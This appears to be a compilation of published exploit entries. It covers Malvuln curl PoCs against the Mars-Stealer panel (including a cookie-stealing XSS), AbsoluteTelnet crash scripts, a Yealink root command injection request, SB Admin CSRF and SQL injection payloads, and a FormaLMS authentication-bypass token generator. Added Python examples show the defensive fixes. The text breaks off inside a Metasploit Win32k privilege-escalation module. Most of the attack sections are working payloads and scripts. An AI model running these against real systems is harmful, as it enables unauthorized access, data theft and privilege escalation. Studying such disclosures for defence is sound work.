<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/8abb41f6e7010d70c90f65fd9a740faa_C.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Win32.MarsStealer Web Panel<br />Vulnerability: Unauthenticated Remote Data Deletion<br />Description: The Mars-Stealer web interface has a "Grab Rules" component area that lets a user specify which type of files to collect from a system as specified in the "grab_manual.txt" manual. Third-party attackers who can reach the Mars-Stealer server can send an HTTP POST request to delete any grab rule from the "mars" MySQL database grabrule table.<br /><br />PHP code snippet "markeractions.php"<br /><br />require_once '../../db.php';<br /><br />switch (trim($_POST['func'])) {<br /> case "markeradd":<br /> markeradd();<br /> break;<br /> case "markerdelete":<br /> markerdelete();<br /> break;<br /> case "markeractive":<br /> markeractive();<br /> break;<br />}<br /><br />Type: WebUI<br />MD5: 8abb41f6e7010d70c90f65fd9a740faa (MarsStealer_Menu.exe)<br />MD5: 03c2c5cb3dba09bfa479fd5c50b5a2cf (dashboard.php)<br />Vuln ID: MVID-2022-0453<br />Disclosure: 01/15/2022<br /><br />Exploit/PoC:<br />c:/>curl http://MARS_STEALER_SERVER/mars/panel/includes/grabactions.php --data "func=grabdelete&id=1"<br />"deleted"<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. 
The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)<br /># Discovered by: Yehia Elghaly<br /># Discovered Date: 2021-11-10<br /># Vendor Homepage: https://www.celestialsoftware.net/<br /># Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe<br /># Tested Version: 11.24<br /># Vulnerability Type: Denial of Service (DoS) Local<br /># Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64<br /><br /># Description: AbsoluteTelnet 11.24 - 'DialUp/Phone' & 'License Name' Denial of Service (PoC)<br /><br /># Steps to reproduce:<br /># 1. - Download and install AbsoluteTelnet<br /># 2. - Run the Python script; it creates exploit.txt<br /># 3. - Open AbsoluteTelnet 11.24<br /># 4. - "New connection file -> DialUp Connection"<br /># 5. - Paste the contents of exploit.txt into "DialUp -> Phone"<br /># 6. - Press the "OK" button<br /># 7. - The application crashes<br /># 8. - Reopen AbsoluteTelnet 11.24<br /># 9. - Paste the same characters into "License Name"<br /># 10.- Click the "Send Error Report" button<br /># 11.- The application crashes<br /><br />#!/usr/bin/python<br /><br /># 1000 bytes of filler; the crash only needs an oversized field value<br />exploit = 'A' * 1000<br /><br />try:<br />    with open("exploit.txt", "w") as file:<br />        file.write(exploit)<br />    print("POC is created")<br />except OSError:<br />    print("POC not created")<br /><br /><br />------<br /><br /># Exploit Title: AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)<br /># Discovered by: Yehia Elghaly<br /># Discovered Date: 2021-11-10<br /># Vendor Homepage: https://www.celestialsoftware.net/<br /># Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe<br /># Tested Version: 11.24<br /># Vulnerability Type: Denial of Service (DoS) Local<br /># Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64<br /><br /># Description: AbsoluteTelnet 11.24 - 'SSH1/SSH2 Username' and 'Error Report' Denial of Service (PoC)<br /><br /># Steps to reproduce:<br /># 1. - Download and install AbsoluteTelnet<br /># 2. - Run the Python script; it creates exploit.txt<br /># 3. - Open AbsoluteTelnet 11.24<br /># 4. - "New connection file -> Connection -> SSH1 & SSH2"<br /># 5. - Paste the contents of exploit.txt into "Authentication -> Username"<br /># 6. - Press the "OK" button<br /># 7. - The application crashes<br /># 8. - Reopen AbsoluteTelnet 11.24<br /># 9. - Paste the same characters into "Your Email Address (optional)"<br /># 10.- Click the "Send Error Report" button<br /># 11.- The application crashes<br /><br /><br />#!/usr/bin/python<br /><br /># Same filler as the first PoC; only the input field differs<br />exploit = 'A' * 1000<br /><br />try:<br />    with open("exploit.txt", "w") as file:<br />        file.write(exploit)<br />    print("POC is created")<br />except OSError:<br />    print("POC not created")<br /><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/8abb41f6e7010d70c90f65fd9a740faa_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Win32.MarsStealer Web Panel<br />Vulnerability: Unauthenticated Remote Persistent XSS<br />Description: The Mars-Stealer web interface has a "Marker Rules" component area. Third-party attackers who can reach the Mars-Stealer server can send HTTP POST requests injecting arbitrary JS code into the "mars" MySql database in the markerrule table. This results in a persistent cross site scripting condition, executing client side code in the security context of the currently logged on user anytime the WebUI is accessed. This can result in PHPSESSID token and data theft or GEO location disclosure of the user accessing the Mars-Stealer WebUI.<br /><br />PHP code snippet "markeractions.php"<br /><br />require_once '../../db.php';<br /><br />switch (trim($_POST['func'])) {<br /> case "markeradd":<br /> markeradd();<br /> break;<br /> case "markerdelete":<br /> markerdelete();<br /> break;<br /> case "markeractive":<br /> markeractive();<br /> break;<br />}<br /><br />Type: WebUI<br />MD5: 8abb41f6e7010d70c90f65fd9a740faa (MarsStealer_Menu.exe)<br />MD5: 03c2c5cb3dba09bfa479fd5c50b5a2cf (dashboard.php)<br />Vuln ID: MVID-2022-0452<br />Disclosure: 01/15/2022<br /><br />Exploit/PoC:<br />curl http://MARS_STEALER/mars/panel/includes/markeractions.php --data "func=markeradd&name=/%3C%3Cscript%3Ealert(document.cookie)%3C/script%3E&marker=WWW.MALVULN.com"<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)<br /># Date: 11-10-2021<br /># Exploit Author: tahaafarooq<br /># Vendor Homepage: https://www.yealink.com/<br /># Version: 53.84.0.15<br /># Tested on: YeaLink IP Phone SIP-T19P (Hardware VoIP Phone)<br /><br />Description:<br /><br />The Diagnostic tool on the Networking tab (Ping / Traceroute) passes the "cmd" parameter to the underlying OS shell without filtering, so an authenticated user can inject arbitrary OS commands. The injected command runs as root, as the uid=0 response below shows.<br /><br />POC:<br /><br />POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1<br />Host: xxx.xxx.xxx.xxx<br />Content-Length: 49<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36<br />Content-Type: application/x-www-form-urlencoded<br />Accept: */*<br />Origin: http://xxx.xxx.xxx.xxx<br />Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: JSESSIONID=9a83d24461329a130<br />Connection: close<br /><br />cmd=; id;&token=1714636915c6acea98<br /><br />-------------------------------------------------<br /><br />HTTP/1.1 200 OK<br />Content-Type: text/html<br />Connection: close<br />Date: Wed, 10 Nov 2021 14:20:23 GMT<br />Server: embed httpd<br />Content-Length: 82<br /><br /><html><br /><body><br /> <div id="_RES_INFO_"><br /> uid=0(root) gid=0(root)<br /> </div><br /></body><br /></html><br /><br /><br /></code></pre>
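The injection above works because the phone splices the "cmd" field into a shell command line, so a leading ";" ends the ping and starts a second command. The following Python is an added example, not the phone firmware and not the exploit author's code. It models the spliced command line the advisory implies, and beside it the validating replacement a diagnostic endpoint should use: accept only an IP address or a hostname, then run the tool through an argv list with no shell at all. The exact firmware command string, the "ping -c 4" shape, and the RFC 1123 hostname policy are assumptions.

```python
import ipaddress
import re
import subprocess

# Hostname labels per RFC 1123: alphanumerics and hyphens, no leading/trailing hyphen.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*\.?$")


def vulnerable_command_line(cmd, tool="ping"):
    """Models what the advisory reports: the cmd parameter is spliced into a
    shell command line (assumed shape; the firmware's real string is not shown).
    With cmd = "; id;" the shell runs "ping -c 4" (fails) and then "id"."""
    return f"{tool} -c 4 {cmd}"


def validate_target(cmd):
    """Return cmd if it is a bare IP address or hostname; raise ValueError otherwise.

    Every shell metacharacter (';', '|', '&', '`', '$', whitespace, quotes)
    fails both checks, so the payload is rejected before any process is started.
    """
    target = cmd.strip()
    if not target or len(target) > 253:
        raise ValueError("empty or oversized diagnostic target")
    try:
        return str(ipaddress.ip_address(target))   # IPv4 or IPv6 literal
    except ValueError:
        pass
    if _HOSTNAME_RE.match(target):
        return target
    raise ValueError(f"rejected diagnostic target: {target!r}")


def build_argv(cmd, tool="ping", count=4):
    """argv for the diagnostic: allow-listed tool, validated target, no shell."""
    if tool not in ("ping", "traceroute"):
        raise ValueError("unknown diagnostic tool")
    argv = [tool]
    if tool == "ping":
        argv += ["-c", str(count)]
    argv.append(validate_target(cmd))
    return argv


def is_rejected(cmd, tool="ping"):
    """True when build_argv refuses the input (used to exercise the validator)."""
    try:
        build_argv(cmd, tool)
    except ValueError:
        return True
    return False


def run_diagnostic(cmd, tool="ping"):
    """shell=False: argv elements are passed to execve and never re-parsed by /bin/sh."""
    return subprocess.run(build_argv(cmd, tool), capture_output=True,
                          text=True, timeout=30).stdout


if __name__ == "__main__":
    print(vulnerable_command_line("; id;"))   # the line the advisory's payload becomes
    print(build_argv("8.8.8.8"))
    print(is_rejected("; id;"))
```

Validation on its own is not the fix; the argv list is. Even a hostname that passes the regex is never interpreted by a shell here, so the only way to run a second command would be a bug in ping itself.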
<pre><code>$$$$$$$\ <br />$$ __$$\ <br />$$ | $$ |$$\ $$\ $$\ $$$$$$$\ $$$$$$\ $$$$$$$\ <br />$$$$$$$ |$$ | $$ | $$ |$$ __$$\ $$ __$$\ $$ _____|<br />$$ ____/ $$ | $$ | $$ |$$ | $$ | $$$$$$$$ |$$ / <br />$$ | $$ | $$ | $$ |$$ | $$ | $$ ____|$$ | <br />$$ | \$$$$$\$$$$ |$$ | $$ |$$\\$$$$$$$\ \$$$$$$$\ <br />\__| \_____\____/ \__| \__|\__|\_______| \_______|<br />Offensive Security Community [Ecuador]<br /><br /><br />Credits & Authors:<br />==================<br />Taurus Omar - @TaurusOmar_ (whoami@taurusomar) [taurusomar.com]<br /><br />Document Title:<br />===============<br />SB Admin Bootstrap CSRF / SQLi Vulnerability / Login Access Bypass<br /><br /><br />Severity Level:<br />===============<br />High<br /><br />Google & Bing Dorks<br />===================<br />intitle:SB Admin - login<br />intitle:SB Admin 2 - login<br /><br />Affected<br />===================<br />Around 1 million sites<br /><br />Vulnerability Reported Timeline:<br />==================================<br />2021-07-31: Reported<br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-01-15: Public Disclosure<br /><br />Discovery Status:<br />=================<br />Published<br /><br />Affected Product(s):<br />====================<br />SB Admin <br />SB Admin 2<br /><br />Product & Service Introduction:<br />===============================<br />SB Admin is a well-known dashboard template that recently migrated to Bootstrap 5. <br />It ships with minimal custom styling based on Google's Material <br />Design patterns and pre-built pages such as a dashboard, charts, data tables <br />and authentication pages, along with a variety of plugins, forming a <br />framework for building admin panels, web apps or dashboard UIs. <br />The product uses PUG templates, SCSS and JS scripts for <br />compilation and production build (no Gulp or heavier Webpack). 
<br /><br />Abstract Advisory Information:<br />==============================<br />An independent researcher discovered multiple vulnerabilities in the official SB Admin application.<br /><br />CSRF Technical Details & Description:<br />=====================================<br />A client-side cross-site request forgery vulnerability has been discovered in the official SB Admin web application.<br />The vulnerability allows an attacker to trigger application functions on a user's behalf, because the login form is submitted without any anti-CSRF token or other request-origin validation.<br />The security risk of the cross-site request forgery vulnerability is estimated as medium, with a CVSS (Common Vulnerability Scoring System) score of 2.5. <br />Exploitation of the vulnerability does not require a web application user account and needs only low user interaction. Successful exploitation of the vulnerability results in unauthorized actions being performed through the SB Admin panel. The web vulnerability can be exploited by any attacker.<br /><br />Proof video:<br />============<br />https://imgur.com/A6KuhcW<br /><br />Proof of Concept CSRF (PoC-1):<br />==============================<br /><html><br /><body><br /><form action="https://site.com/panel/index.html" method="POST"><br /><!-- name attributes assumed from the login request captured below; the injection string is the field value --><br /><input type="hidden" name="usuario" id="exampleInputEmail1" value='" OR 1 = 1 -- -"'><br /><input type="hidden" name="senha" id="exampleInputPassword" value='" OR 1 = 1 -- -"'><br /><button type="submit" class="btn btn-primary btn-user btn-block">Login</button><br /></form><br /></body><br /></html><br /><br />Proof of Concept CSRF (PoC-2):<br />==============================<br /><html><br /><body><br /><form action="https://site.com/panel/index.php" method="POST"><br /><!-- same form as PoC-1, posted to the PHP login handler instead --><br /><input type="hidden" name="usuario" id="exampleInputEmail1" value='" OR 1 = 1 -- -"'><br /><input type="hidden" name="senha" id="exampleInputPassword" value='" OR 1 = 1 -- -"'><br /><button type="submit" class="btn btn-primary btn-user btn-block">Login</button><br /></form><br /></body><br /></html><br /><br /><br />Sqli Technical Details & Description:<br />=====================================<br />A SQL injection attack consists of the insertion or "injection" of SQL syntax via <br />the login input data sent from the client to the application. A successful SQL injection<br />exploit can read sensitive data from the database, modify database data <br />(Insert/Update/Delete), execute administrative operations on the database <br />(such as shutting down the DBMS) and recover the content of a given file present on the DBMS file system.<br /><br />Proof video:<br />============<br />https://imgur.com/0Z7vtj4<br /><br />Payload (the § marks are Burp Intruder insertion points):<br />========<br />usuario=§" OR 1 = 1 UNION ALL SELECT CONCAT(0x716b767671,0x677571554f657363504e4974794a7a4a6e43786b727a45514d5146766f6241706a73716e4c527651,0x7178627071),NULL-- - -- -"§&password=§" OR 1 = 1 -- -"§<br /><br />BurpSuite<br />==========<br />POST /requisicao/login.php HTTP/1.1<br />Host: 186.251.225.174<br />Content-Length: 47<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36<br />Content-Type: application/x-www-form-urlencoded<br />Accept: */*<br />Origin: http://186.251.225.174<br />Referer: http://186.251.225.174/login.html<br />Accept-Encoding: gzip, deflate<br />Accept-Language: es-CO,es;q=0.9<br />Connection: close<br /><br />usuario=" OR 1 = 1 -- -"&senha=" OR 1 = 1 -- -"<br /><br />Vulnerable Inputs<br />======================<br />usuario=" OR 1 = 1 -- -"&senha=" OR 1 = 1 -- -"<br />email=" OR 1 = 1 -- -"&password=" OR 1 = 1 -- -"<br />username=" OR 1 = 1 -- -"&password=" OR 1 = 1 -- -"<br />user=" OR 1 = 1 -- -"&pass=" OR 1 = 1 -- -"<br /><br /><br />#######<br />#<br /># Disclaimer:<br /># This or previous programs are for Educational purpose ONLY. Do not use it without permission. <br /># The usual disclaimer applies, especially the fact that Taurus Omar is not liable for any damages <br /># caused by direct or indirect use of the information or functionality provided by these programs. <br /># The author or any Internet provider bears NO responsibility for content or misuse of these programs <br /># or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, <br /># system crash, system compromise, etc.) caused by the use of these programs are not Taurus Omar's <br /># responsibility.<br />#<br />#######<br /></code></pre>
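The payloads above only work if the login handler builds its SQL by pasting the two form fields into the query text, so that `" OR 1 = 1 -- -"` closes the string, adds an always-true condition, and comments out the password check. The following Python is an added example, not the advisory's code and not SB Admin's. It reproduces that query shape against an in-memory SQLite table and puts the parameterised form beside it. The table, the credentials and the query text are constructed for the demonstration; the payload here uses a single quote because this query single-quotes its values (the advisory's target quoted with double quotes, which MySQL also treats as a string delimiter).

```python
import sqlite3


def make_db():
    """Constructed sample table; the real panel's schema is not on the page."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE usuarios (usuario TEXT NOT NULL, senha TEXT NOT NULL)")
    con.execute("INSERT INTO usuarios VALUES ('admin', 'correct-horse-battery')")
    con.commit()
    return con


def build_vulnerable_sql(usuario, senha):
    """Query shape the advisory's payloads imply: both fields are spliced into
    the SQL text (assumed; the target's login.php itself is not shown).
    Must stay on one line: the injected '-- ' comment runs to end of line."""
    return ("SELECT COUNT(*) FROM usuarios WHERE usuario = '%s' AND senha = '%s'"
            % (usuario, senha))


def vulnerable_login(con, usuario, senha):
    """With the payload the WHERE clause becomes
    usuario = '' OR 1 = 1 -- -' AND senha = '...'  so every row matches."""
    return con.execute(build_vulnerable_sql(usuario, senha)).fetchone()[0] > 0


def safe_login(con, usuario, senha):
    """Same check with bound parameters: the payload is compared as data and
    matches no row. (Plaintext password storage is for the demo only.)"""
    sql = "SELECT COUNT(*) FROM usuarios WHERE usuario = ? AND senha = ?"
    return con.execute(sql, (usuario, senha)).fetchone()[0] > 0


# The advisory's payload adapted to a single-quoted query.
PAYLOAD = "' OR 1 = 1 -- -"

if __name__ == "__main__":
    con = make_db()
    print(build_vulnerable_sql(PAYLOAD, PAYLOAD))
    print("vulnerable:", vulnerable_login(con, PAYLOAD, PAYLOAD))   # True
    print("parameterized:", safe_login(con, PAYLOAD, PAYLOAD))      # False
```

The trailing `-` after `--` in the payload is not an SQLite or MySQL requirement of this query; it is the usual habit of guaranteeing a space after the comment marker, which MySQL insists on.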
<pre><code># Exploit Title: FormaLMS 2.4.4 - Authentication Bypass<br /># Google Dork: inurl:index.php?r=adm/<br /># Date: 2021-11-10<br /># Exploit Author: Cristian 'void' Giustini @ Hacktive Security<br /># Vendor Homepage: https://formalms.org<br /># Software Link: https://formalms.org<br /># Version: <= 2.4.4<br /># Tested on: Linux<br /># CVE : CVE-2021-43136<br /><br /># Info: An authentication bypass issue in FormaLMS <= 2.4.4 allows an attacker to bypass the authentication mechanism and obtain valid access to the platform.<br /><br /># Analysis:<br />https://blog.hacktivesecurity.com/index.php/2021/10/05/cve-2021-43136-formalms-the-evil-default-value-that-leads-to-authentication-bypass/<br /><br /># Nuclei template:<br />https://gist.github.com/hacktivesec/d2160025d24c5689d1bc60173914e004#file-formalms-authbypass-yaml<br /><br />#!/usr/bin/env python3<br /><br />"""<br /><br />The following exploit generates two URLs, one with the fixed default value of the "secret" and one with an empty secret. For exploitation to succeed the "Enable SSO with a third party software through a token" setting needs to be enabled.<br /><br />"""<br /><br />import sys<br />import time<br />import hashlib<br /><br /># Default SSO secret shipped with FormaLMS<br />secret = "8ca0f69afeacc7022d1e589221072d6bcf87e39c"<br /><br /><br />def help():<br />    print(f"Usage: {sys.argv[0]} username target_url")<br />    sys.exit()<br /><br /><br />if len(sys.argv) < 3:<br />    help()<br /><br />user, url = (sys.argv[1], sys.argv[2])<br /># Timestamp placed 5000 seconds in the future so the token is still valid when used<br />t = str(int(time.time()) + 5000)<br /># Token scheme: MD5("user,time,secret"), upper-case hex<br />token = hashlib.md5(f"{user},{t},{secret}".encode()).hexdigest().upper()<br />final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}"<br />print(f"URL with default secret: {final_url}")<br /># Same token with an empty secret, for installations that never set one<br />token = hashlib.md5(f"{user},{t},".encode()).hexdigest().upper()<br />final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}"<br />print(f"URL with empty secret: {final_url}")<br /></code></pre>
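The bypass above rests on three things: the SSO token is an unkeyed MD5 over "user,time,secret", the secret is either the shipped default or empty, and the timestamp is chosen by the client. The following Python is an added example, not FormaLMS code and not the exploit author's. It reproduces the forged scheme so the bypass can be checked locally, and beside it the verification a hardened SSO endpoint would perform: refuse an unset or default secret, bound the token's validity window in both directions, key the digest with HMAC-SHA256 and compare in constant time. The TTL and clock-skew values are assumptions; FormaLMS's own policy is not on the page.

```python
import hashlib
import hmac
import time

# Secret the exploit above reports as FormaLMS's shipped default.
DEFAULT_SECRET = "8ca0f69afeacc7022d1e589221072d6bcf87e39c"
# Assumed policy values for the hardened check.
TOKEN_TTL = 300     # seconds a token stays valid after its timestamp
CLOCK_SKEW = 60     # tolerated drift between issuer and verifier clocks


def legacy_token(user, t, secret):
    """Token the exploit forges: MD5 over "user,time,secret", upper-cased hex."""
    return hashlib.md5(f"{user},{t},{secret}".encode()).hexdigest().upper()


def legacy_verify(user, t, token, secret):
    """Check as the exploit implies it: the digest matches and nothing else.
    With the default or an empty secret anyone can produce a matching token,
    and a far-future timestamp keeps it usable indefinitely."""
    return legacy_token(user, t, secret) == token


def hardened_token(user, t, secret):
    """HMAC-SHA256 keyed with a per-installation secret (bytes). The secret is
    a key, not part of the hashed message, so it cannot be guessed offline
    from a captured token without a brute-force against the HMAC."""
    return hmac.new(secret, f"{user},{t}".encode(), hashlib.sha256).hexdigest()


def hardened_verify(user, t, token, secret, now=None):
    """Reject unset/default secrets, enforce a bounded validity window and
    compare in constant time. `now` is injectable for deterministic tests."""
    if not secret or secret == DEFAULT_SECRET.encode():
        return False                      # installation never set its own secret
    now = int(time.time()) if now is None else now
    if t > now + CLOCK_SKEW:              # the exploit dates tokens 5000 s ahead
        return False
    if now - t > TOKEN_TTL:               # expired
        return False
    return hmac.compare_digest(hardened_token(user, t, secret), token)


if __name__ == "__main__":
    t = int(time.time()) + 5000
    forged = legacy_token("admin", t, DEFAULT_SECRET)
    print("legacy accepts forged token:", legacy_verify("admin", t, forged, DEFAULT_SECRET))
    print("hardened accepts default-secret token:",
          hardened_verify("admin", t, hardened_token("admin", t, DEFAULT_SECRET.encode()),
                          DEFAULT_SECRET.encode()))
```

Refusing the default secret at verification time is the cheap safety net; the real fix is to generate a random secret at install and make the SSO feature unusable until one exists.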
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/8abb41f6e7010d70c90f65fd9a740faa.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Win32.MarsStealer Web Panel<br />Vulnerability: Unauthenticated Remote Information Disclosure<br />Description: The malware web interface stores screen captures named "screenshot.jpg" in the panel directory, ZIP archived. Third-party attackers who can reach the Mars web server can download any screenshots as no valid session or authentication check is done.<br /><br />view.php PHP code.<br /><br />$z = new ZipArchive();<br />$file ='screenshot.jpg'; <br />$path = $_GET["path"];<br />if ($z->open(realpath($path))) <br />{<br /> $stat = $z->statName($file);<br /> $fp = $z->getStream($file); <br /> <br /> header('Content-Type: image/jpeg'); <br /> header('Content-Length: ' . $stat['size']); <br /> fpassthru($fp); <br />}<br />else<br />{<br /> echo "file not found";<br />}<br /><br /><br />Type: WebUI<br />MD5: 8abb41f6e7010d70c90f65fd9a740faa (MarsStealer_Menu.exe)<br />MD5: 03c2c5cb3dba09bfa479fd5c50b5a2cf (dashboard.php)<br />Vuln ID: MVID-2022-0451<br />Disclosure: 01/15/2022<br /><br />Exploit/PoC:<br />curl http://MARSSTEALER_SERVER/mars/panel/view.php?path=screenshot.zip --output screendump.jpg<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. 
The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
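view.php above hands $_GET["path"] straight to realpath() and streams a member out of whatever archive that resolves to, with no session check: any archive on the host that contains a screenshot.jpg member can be read by anyone who can reach the panel. The following Python is an added example, not the panel's code and not Malvuln's, of the two checks the endpoint lacks: a session gate, and a base-directory confinement that resolves the requested path and refuses anything that lands outside the panel directory, absolute paths included. The helper builds a throwaway panel directory with a constructed screenshot.zip and a second archive one level up, so the confinement can be exercised offline; the panel layout is an assumption.

```python
import os
import tempfile
import zipfile

SCREENSHOT_MEMBER = "screenshot.jpg"
# Constructed stand-in for a JPEG; only the bytes matter for the demonstration.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0" + b"constructed-sample-image" + b"\xff\xd9"


def confined_path(base_dir, user_path):
    """Resolve user_path beneath base_dir and refuse anything that escapes it.

    realpath() follows symlinks and collapses '..', so the comparison is made
    on the final on-disk location, not on the string the client sent.
    An absolute user_path makes os.path.join discard base_dir entirely, which
    the commonpath check catches as well.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"path escapes panel directory: {user_path!r}")
    return target


def read_screenshot(base_dir, user_path, session_ok):
    """Serve the member only for an authenticated session and a confined path."""
    if not session_ok:
        raise PermissionError("no valid session")     # the check view.php lacks
    archive = confined_path(base_dir, user_path)
    with zipfile.ZipFile(archive) as z:
        return z.read(SCREENSHOT_MEMBER)


def is_rejected(base_dir, user_path, session_ok=True):
    """True when read_screenshot refuses the request (for exercising the checks)."""
    try:
        read_screenshot(base_dir, user_path, session_ok)
    except PermissionError:
        return True
    return False


def make_sample_panel():
    """Throwaway layout: <root>/panel/screenshot.zip (served) and
    <root>/outside.zip (must never be reachable through the panel)."""
    root = tempfile.mkdtemp()
    panel = os.path.join(root, "panel")
    os.mkdir(panel)
    with zipfile.ZipFile(os.path.join(panel, "screenshot.zip"), "w") as z:
        z.writestr(SCREENSHOT_MEMBER, SAMPLE_JPEG)
    with zipfile.ZipFile(os.path.join(root, "outside.zip"), "w") as z:
        z.writestr(SCREENSHOT_MEMBER, b"should never be served")
    return panel


if __name__ == "__main__":
    panel = make_sample_panel()
    print(len(read_screenshot(panel, "screenshot.zip", session_ok=True)), "bytes served")
    print("traversal rejected:", is_rejected(panel, "../outside.zip"))
    print("unauthenticated rejected:", is_rejected(panel, "screenshot.zip", session_ok=False))
```

The order of the checks matters: the session gate runs first so an unauthenticated client learns nothing about which paths exist, and the confinement is applied to the resolved path rather than to the raw query string.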
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = GoodRanking<br /><br /> include Msf::Post::File<br /> include Msf::Post::Windows::Priv<br /> include Msf::Post::Windows::Process<br /> include Msf::Post::Windows::ReflectiveDLLInjection<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> {<br /> 'Name' => 'Win32k NtGdiResetDC Use After Free Local Privilege Elevation',<br /> 'Description' => %q{<br /> A use after free vulnerability exists in the `NtGdiResetDC()` function of Win32k which can be leveraged by<br /> an attacker to escalate privileges to those of `NT AUTHORITY\SYSTEM`. The flaw exists due to the fact<br /> that this function calls `hdcOpenDCW()`, which performs a user mode callback. During this callback, attackers<br /> can call the `NtGdiResetDC()` function again with the same handle as before, which will result in the PDC object<br /> that is referenced by this handle being freed. The attacker can then replace the memory referenced by the handle<br /> with their own object, before passing execution back to the original `NtGdiResetDC()` call, which will now use the<br /> attacker's object without appropriate validation. 
This can then allow the attacker to manipulate the state of the<br /> kernel and, together with additional exploitation techniques, gain code execution as NT AUTHORITY\SYSTEM.<br /><br /> This module has been tested to work on Windows 10 x64 RS1 (build 14393) and RS5 (build 17763), however previous versions<br /> of Windows 10 will likely also work.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'IronHusky', # APT Group who exploited this in the wild<br /> 'Costin Raiu', # Initial reporting on bug at SecureList<br /> 'Boris Larin', # Initial reporting on bug at SecureList<br /> "Red Raindrop Team of Qi'anxin Threat Intelligence Center", # detailed analysis report in Chinese showing how to replicate the vulnerability<br /> 'KaLendsi', # First Public POC targeting Windows 10 build 14393 only, later added support for 17763<br /> 'ly4k', # GitHub POC adding support for Windows 10 build 17763, PoC used for this module.<br /> 'Grant Willcox' # metasploit module<br /> ],<br /> 'Arch' => [ ARCH_X64 ],<br /> 'Platform' => 'win',<br /> 'SessionTypes' => [ 'meterpreter' ],<br /> 'DefaultOptions' => {<br /> 'EXITFUNC' => 'thread'<br /> },<br /> 'Targets' => [<br /> [ 'Windows 10 x64 RS1 (build 14393) and RS5 (build 17763)', { 'Arch' => ARCH_X64 } ]<br /> ],<br /> 'Payload' => {<br /> 'DisableNops' => true<br /> },<br /> 'References' => [<br /> [ 'CVE', '2021-40449' ],<br /> [ 'URL', 'https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/' ], # Initial report of in the wild exploitation<br /> [ 'URL', 'https://mp.weixin.qq.com/s/AcFS0Yn9SDuYxFnzbBqhkQ' ], # Detailed writeup<br /> [ 'URL', 'https://github.com/KaLendsi/CVE-2021-40449-Exploit' ], # First public PoC<br /> [ 'URL', 'https://github.com/ly4k/CallbackHell' ] # Updated PoC this module uses for exploitation.<br /> ],<br /> 'DisclosureDate' => '2021-10-12',<br /> 